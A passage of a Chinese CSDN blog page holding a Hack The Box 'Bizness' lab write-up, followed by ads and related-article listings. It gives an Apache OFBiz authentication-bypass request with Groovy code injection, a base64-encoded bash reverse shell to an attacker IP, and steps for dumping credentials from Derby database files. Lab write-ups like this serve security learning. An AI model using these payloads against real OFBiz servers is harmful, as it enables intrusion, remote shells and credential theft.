【无标题】Hack The Box-Bizness_bizness htb,网络安全编程基础培训

最新推荐文章于 2024-11-09 23:02:02 发布
最新推荐文章于 2024-11-09 23:02:02 发布
阅读量934 收藏 9
点赞数 12
分类专栏: 2024年程序员学习 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84240369/article/details/137616782
版权

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception(‘id’.execute().text);

可以看到成功返回id的信息
在这里插入图片描述
9. 反弹一下shell,需要注意的点就是反弹shell的命令中空格替代为+,将原有的+替代为%2b

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: bizness.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded

groovyProgram=‘bash±c+{echo,YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4xNDQvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}’.execute();

在这里插入图片描述
10. 然后到家目录下找到user.txt文件即可
11. 上传linpeas.sh文件进行测试,上传方式就是在kali机器上使用python开一个简单的文件服务,然后目标机器用wget下载即可。
在这里插入图片描述
12. 运行linpeas.sh
在这里插入图片描述
13. 通过扫描发现了N多xml配置文件,在寻找的过程中突发奇想,找一下数据库配置的相关文件,网上搜索了一下ofbiz的数据库配置文件,entityengine.xml,然后通过find命令找到该文件,发现了许多用户名和密码。
在这里插入图片描述
返回linpeas查看了一下开放的端口,发现没有3306和1433等几个数据库的端口
在这里插入图片描述
然后呢看到最后发现有一些dat文件,并且文件夹是在derby下,berby是个小型的数据库,有两种运行模式,内嵌和网络,这里使用的就是内嵌模式。
在这里插入图片描述
既然找到了数据存储的位置,那我们就看一下里面有没有什么重要信息,seg0就是存储数据的地方
在这里插入图片描述
看了一下发现有许多文件
在这里插入图片描述
下一步就是将seg0打包发送到我们本机(方式是靶机使用python3 -m http.server开一个小型文件服务器,然后攻击机上访问一下即可),使用dbeaver打开查看,有点费时间,换一个思路
14. 然后查看一下有没有password关键字,strings -f seg0/*.dat | grep -i 'password',然后我们发现了admin加密后的密码。
在这里插入图片描述

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

写在最后

在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
[外链图片转存中…(img-evLb4i9M-1712765138877)]

2401_84240369
关注
专栏目录
HTB Bizness
qq_58869808的博客
01-07 949
writeUp
Hack The Box-Bizness
m0_52742680的博客
01-08 1224
使用nmap工具对ip进行扫描发现开放了22、80、443三个端口。
OFBiz RCE漏洞复现(CVE-2023-51467)
柠檬i的博客
01-13 1649
Apache OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。来自长亭科技的安全研究员枇杷哥利用这一点找到了另一个可以导致RCE的方法:Groovy表达式注入。这个漏洞的原因是对于。
无标题Hack The Box-Bizness_bizness htb(1),网络安全基础开发与实践
2301_76225520的博客
04-16 361
6. 通过搜素发现有个RCE漏洞,参考链接:https://github.com/vulhub/vulhub/blob/master/ofbiz/CVE-2023-49070/README.zh-cn.md,接下来就是测试阶段。8. 然后去网上搜索了一下相关版本的漏洞,发现了一个CVE-2023-51467,然后使用下面的poc验证一下。看了一下没什么东西,就是一个简单的网站,不过可能需要注意的是最下方的Email。仔细看的话我们会发现页面的右下角显示了版本号。7. 访问一下accounting页面,
无标题Hack The Box-Bizness
弟弟救我的博客
01-16 824
HTB Bizness
5-款傻瓜式手机-APP-开发工具.pdf
07-02
【标题】: 5款傻瓜式手机APP开发工具 【描述】: 本文将介绍5款简单易用的手机APP开发工具,这些工具旨在帮助不具备编程知识的用户也能轻松创建自己的应用程序,满足个人或企业的各种需求。无论是为了提升品牌形象...
shpool-stats:
07-09
shpool-stats 我每天午餐时打台球,需要统计数据。 这实际上是最不有趣的回购,除非您是我或观看这场台球比赛的 3 个人。... 它跟踪 srs bizness 就像我在所说的台球游戏中作弊的程度一样(提示:我作弊很多)
AUv3-Example-App:完整的应用程序
04-13
该项目是由历史悠久的莫尔豪斯学院音乐技术系的格莱美奖得主肯纳德·加勒特( Kennard Garrett)和亨尼·塔·比斯尼斯( Henny tha Bizness )共同创建的。 AudioKit开发团队由和领导。 观看视频: 此仓库目前是...
App在线开发、App软件开发、App制作最常用工具知识.pdf
01-31
App在线开发工具是一种简化移动应用开发过程的平台,它们通常不需要开发者具备深厚的编程技能,而是通过提供图形化界面和预设的功能模块,让使用者能够快速创建自己的App。以下是对几个主流App在线开发工具的详细...
iOS 热更新/热修复
热门推荐
srxboys的博客
07-13 1万+
热更新/热修复(调研的可能不全) 热更新 1、* Flutter * 由于渲染的基础(gdi)是自己实现的,所以实现跨平台、性能优化、摆脱平台约束方面的裕度更大。从实际体验来看, Flutter 的性能比 RN 要高不少。优点可能是性能,但由于它完全自定义了一套 ui 系统,这也是它的限制。热更新可使用[code-push](codepush https://githu...
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
11-06 1983
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全从入门到精通(特别篇IIl):应急响应之病毒蠕虫处置流程
HACKONE的博客
11-06 165
排查 init.d 目录下的脚本文件,如果某个脚本启动的服务进程与名称不符,或者脚本文件的内容被修改,加有别的什么东西启动了别的进程,必须仔细排查,极可能是被用来启动后门进程了。排查C: \、C: \winnt、C: \winnt\System 、C: \winnt\ System32、C: \winnt\System32\dllcache、C: \winnt\System32\ drivers、各个Program Files目录下的内容,排查他们目录及文件的属性,若无版本说明,多为可疑文件;
硬件设备网络安全问题与潜在漏洞分析及渗透测试应用
weixin_62512865的博客
11-08 1151
硬件加密绕过漏洞:研究发现,多款流行的SSD存在加密机制绕过漏洞,攻击者可以无需密码 即可绕过硬盘加密措施,获取硬盘中的数据内容。这包括Crucial和Samsung等品牌的SSD产 品,它们尝试实现TCG Opal加密标准,但存在缺陷,允许在不知道任何密钥的情况下完全恢 复数据。固件更新机制漏洞:英睿达MX500系列SSD被曝出存在缓冲区溢出漏洞,攻击者可以精心构 造ATA数据包,通过主机直接发送给SSD控制器,从而触发缓冲区溢出,可能导致数据泄露。
入门网络安全工程师要学习哪些内容(详细教程)
白帽子佳奇的博客
11-06 678
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
标题:网络安全:数字时代的守护盾
运维人生
11-08 509
网络安全是指保护网络系统中的硬件、软件及数据免受恶意攻击、破坏、泄露或非法使用的状态和能力。系统安全:确保服务器、路由器、交换机等网络基础设施的安全运行,防止被非法入侵或篡改。数据安全:保护存储在网络中的数据不被未经授权的访问、泄露、修改或删除。应用安全:确保网络应用程序(如网站、移动APP)没有安全漏洞,能够抵御恶意软件的攻击。身份与访问管理:通过认证、授权和审计机制,确保只有合法用户才能访问特定资源。网络安全意识:提高用户对网络威胁的认识,教育他们如何识别和防范钓鱼邮件、恶意链接等常见攻击手段。
网络安全:数字时代的防护盾
勇敢的人先享受世界
11-06 660
网络安全(Cybersecurity)是指采取一系列措施来保护网络及其传输的数据免受未经授权的访问、篡改、攻击和损坏。机密性(Confidentiality):确保信息只能被授权的人或系统访问,防止数据泄露。完整性(Integrity):确保数据在传输和存储过程中不被篡改,保证数据的准确性和可靠性。可用性(Availability):确保数据和网络服务对合法用户的可用性,不受阻止或中断。网络安全不仅仅是防止黑客攻击,还包括防止各种类型的网络威胁、确保系统可靠性、实施安全政策和技术等多方面内容。
网络安全 | 并发问题】Nginx重试机制与幂等性问题分析
最新发布
等风来
11-09 217
在现代互联网应用中,高可用性(HA)是确保系统稳定性的关键要求之一。为了应对服务器出现故障或超时等问题,负载均衡被广泛应用于分布式系统中。Nginx作为一种高性能的反向代理服务器,常常被用于实现负载均衡和容错功能。当被代理的服务出现错误时,Nginx可以自动将请求转发到其他健康的服务器,从而提高系统的可用性和容错能力。然而,在实际应用中,Nginx的错误重试机制可能会导致一些业务上的意外问题,尤其是在处理非幂等性HTTP请求(如POST、DELETE)时。
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
11-06 1133
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全属性详解
QQ_778132974的博客
11-06 704
实现方式:通过监控和管理信息的传播过程,以及限制不良信息的传播,来实现信息的可控性。因此,可以通过创建含有网络应用名、版本、前端框架、后端框架、服务端语言、服务器操作系统、网站容器、内容管理系统和数据库等信息的“WEB指纹”,来对某个互联网应用进行识别。在网络安全态势评估中,利用网络安全属性的历史记录和运行状况等信息,可以判断一个网络当下的安全状态和网络安全发展趋势。三、应用场景网络安全属性广泛应用于国家信息基础设施的各个领域,如教育、娱乐、医疗、运输、国家安全、电力供给及通信等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值